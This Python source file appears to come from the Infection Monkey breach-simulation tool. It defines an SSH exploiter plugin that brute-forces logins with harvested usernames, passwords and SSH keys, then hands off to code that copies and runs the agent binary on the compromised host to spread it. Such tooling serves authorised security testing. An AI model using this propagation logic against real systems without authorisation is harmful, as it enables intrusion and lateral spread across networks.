import logging
from functools import partial
from pprint import pformat
from typing import Any, Dict, Sequence

# common imports
from common.credentials import Password, SSHKeypair, Username
from common.event_queue import IAgentEventPublisher
from common.types import AgentID, Event
from common.utils.code_utils import del_key

# dependencies to get rid of or internalize
from infection_monkey.exploit import IAgentBinaryRepository, IAgentOTPProvider
from infection_monkey.exploit.tools import (
    BruteForceCredentialsProvider,
    BruteForceExploiter,
    all_tcp_ports_are_closed,
    generate_brute_force_credentials,
    identity_type_filter,
    secret_type_filter,
)
from infection_monkey.exploit.tools.helpers import get_agent_dst_path
from infection_monkey.i_puppet import ExploiterResult, TargetHost
from infection_monkey.propagation_credentials_repository import IPropagationCredentialsRepository

from .ssh_command_builder import build_ssh_command
from .ssh_options import SSHOptions
from .ssh_remote_access_client import SSH_PORTS
from .ssh_remote_access_client_factory import SSHRemoteAccessClientFactory

# Module-level logger, named after this module
logger = logging.getLogger(__name__)


def should_attempt_exploit(host: TargetHost) -> bool:
    """
    Decide whether the SSH exploiter is worth running against a host.

    :param host: The target host
    :return: False when ``all_tcp_ports_are_closed(host, SSH_PORTS)`` is true,
             True otherwise
    """
    ssh_ports_closed = all_tcp_ports_are_closed(host, SSH_PORTS)
    return not ssh_ports_closed


class Plugin:
    """
    Exploiter plugin that brute-forces SSH credentials against a target host.

    Credentials come from a BruteForceCredentialsProvider, and exploitation is
    delegated to a BruteForceExploiter that uses SSH remote access clients.
    """

    def __init__(
        self,
        *,
        plugin_name: str,
        agent_id: AgentID,
        agent_event_publisher: IAgentEventPublisher,
        agent_binary_repository: IAgentBinaryRepository,
        propagation_credentials_repository: IPropagationCredentialsRepository,
        otp_provider: IAgentOTPProvider,
        **kwargs,
    ):
        """
        :param plugin_name: Passed to BruteForceExploiter as the exploiter name
        :param agent_id: ID of the running agent; used by the exploiter and the
                         SSH command builder
        :param agent_event_publisher: Publisher handed to BruteForceExploiter
        :param agent_binary_repository: Repository handed to BruteForceExploiter
        :param propagation_credentials_repository: Source of credentials for the
                                                   brute-force credentials provider
        :param otp_provider: OTP provider passed to the SSH command builder
        :param kwargs: Additional keyword arguments; accepted and ignored
        """
        self._plugin_name = plugin_name
        self._agent_id = agent_id
        self._agent_event_publisher = agent_event_publisher
        self._agent_binary_repository = agent_binary_repository

        # Only username identities paired with password or SSH keypair secrets are
        # usable for SSH logins, so restrict the generated credentials accordingly.
        credentials_generator = partial(
            generate_brute_force_credentials,
            identity_filter=identity_type_filter([Username]),
            secret_filter=secret_type_filter([Password, SSHKeypair]),
        )
        self._credentials_provider = BruteForceCredentialsProvider(
            credentials_repository=propagation_credentials_repository,
            generate_brute_force_credentials=credentials_generator,
        )
        self._otp_provider = otp_provider

    def run(
        self,
        *,
        host: TargetHost,
        servers: Sequence[str],
        current_depth: int,
        options: Dict[str, Any],
        interrupt: Event,
        **kwargs,
    ) -> ExploiterResult:
        """
        Attempt to exploit a host over SSH by brute-forcing credentials.

        :param host: The target host
        :param servers: Server addresses passed to the SSH command builder
        :param current_depth: Current propagation depth, passed to the SSH
                              command builder
        :param options: Raw plugin options, parsed into SSHOptions. The caller's
                        dictionary is not modified.
        :param interrupt: Event passed through to BruteForceExploiter.exploit_host
                          (presumably used to stop early - confirm)
        :param kwargs: Additional keyword arguments; accepted and ignored
        :return: The result of the exploitation attempt. Option-parsing failures,
                 hosts without open SSH ports and unexpected exceptions raised
                 during exploitation are reported through the result's
                 ``error_message`` rather than raised.
        """
        # The "http_ports" option is a hack: it is only present because
        # fingerprinters need it, so remove it before parsing into SSHOptions.
        # Work on a shallow copy so the caller's options dictionary is not mutated.
        options = dict(options)
        del_key(options, "http_ports")

        try:
            logger.debug(f"Parsing options: {pformat(options)}")
            ssh_options = SSHOptions(**options)
        except Exception as err:
            msg = f"Failed to parse SSH options: {err}"
            logger.exception(msg)
            return ExploiterResult(error_message=msg)

        if not should_attempt_exploit(host):
            msg = f"Host {host.ip} has no open SSH ports"
            logger.debug(msg)
            return ExploiterResult(
                exploitation_success=False, propagation_success=False, error_message=msg
            )

        # Bind everything except the per-attempt arguments, so the client factory
        # can build SSH commands without knowing about agent-wide state.
        command_builder = partial(
            build_ssh_command,
            agent_id=self._agent_id,
            target_host=host,
            servers=servers,
            current_depth=current_depth,
            otp_provider=self._otp_provider,
        )

        ssh_exploit_client_factory = SSHRemoteAccessClientFactory(
            host=host, options=ssh_options, command_builder=command_builder
        )

        brute_force_exploiter = BruteForceExploiter(
            exploiter_name=self._plugin_name,
            agent_id=self._agent_id,
            destination_path=get_agent_dst_path(host),
            exploit_client_factory=ssh_exploit_client_factory,
            get_credentials=self._credentials_provider,
            agent_binary_repository=self._agent_binary_repository,
            agent_event_publisher=self._agent_event_publisher,
            tags={"ssh-exploiter"},
        )

        # Plugin boundary: convert any unexpected failure into an error result
        # instead of letting it propagate to the caller.
        try:
            logger.debug(f"Running SSH exploiter on host {host.ip}")
            return brute_force_exploiter.exploit_host(host, interrupt)
        except Exception as err:
            msg = f"An unexpected exception occurred while attempting to exploit host: {err}"
            logger.exception(msg)
            return ExploiterResult(error_message=msg)
